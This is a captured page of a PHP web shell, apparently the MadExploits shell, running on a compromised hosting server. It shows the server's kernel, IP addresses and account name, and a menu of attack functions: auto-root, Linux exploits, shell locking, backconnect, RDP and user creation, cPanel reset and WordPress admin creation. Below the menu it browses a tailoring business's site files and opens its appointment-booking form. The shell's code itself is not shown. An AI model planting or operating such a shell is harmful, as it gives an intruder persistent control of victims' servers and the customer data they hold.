Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.12.150.240
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
iTailor-gold /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
pm
[ DIR ]
drwxr-xr-x
booking.php
3.04
KB
-rw-r--r--
contact-data.php
1.01
KB
-rw-r--r--
faq.php
12.51
KB
-rw-r--r--
index.php
11.14
KB
-rw-r--r--
login.php
1.63
KB
-rw-r--r--
logout.php
239
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : booking.php
<?php include("includes/header.php");?> <section class="faq"> <div class="custom-container"> <div class="width-888"> <div class="itgold-txt"> <h2 class="bm">USA Trunk Show Dates & Locations</h2> <p>Browse through all the cities we are coming to and book your appointment with us</p> <div class="line1"></div> </div> <div class="dropdown-fm"> <form action="pm/process-booking.php" method="post" class="book-it-gold"> <div class="row-half"> <!-- <div class="left asd_fr_div"> <div class="form-group"> <label for="location">please select a location</label> <select id="location" name="location"> <option value="" disabled="" selected="">choose a location</option> <option value="Other">Other</option> </select> <p class="hide">Please select a reason</p> </div> <div class="form-group"> <label for="service">service</label> <select id="service" name="service"> <option value="" disabled="" selected="">select service</option> <option value="Other">Other</option> </select> <p class="hide">Please select a service</p> </div> <div class="form-group"> <label for="date">date availability</label> <select id="date" name="date"> <option value="" disabled="" selected="">choose a date</option> <option value="Other">Other</option> </select> <p class="hide">Please select date</p> </div> </div> --> <div class="right asd_fr_div"> <div class="form-group"> <label for="name">Name</label> <input type="text" id="name" name="name" placeholder="your good name" required> <p class="hide">Please write your Name</p> </div> <div class="form-group"> <label for="email">Email</label> <input type="email" id="email" name="email" placeholder="your email address" required> <p class="hide">Please select Email Id</p> </div> <div class="form-group"> <label for="phone number">phone number</label> <input type="tel" id="phone" name="phone" placeholder="Enter phone number" required> <p class="hide">Please select a phone no</p> </div> </div> </div> <div class="row-half"> <button class="sm-btn-header asd_fr_div" type="submit"> Request Appointment </button> <!-- <button class="reset_btn sm-btn-header asd_fr_div" type="reset"> Reset </button> --> </div> </form> </div> </div> </div> </section> <?php include("includes/footer.php");?>
Close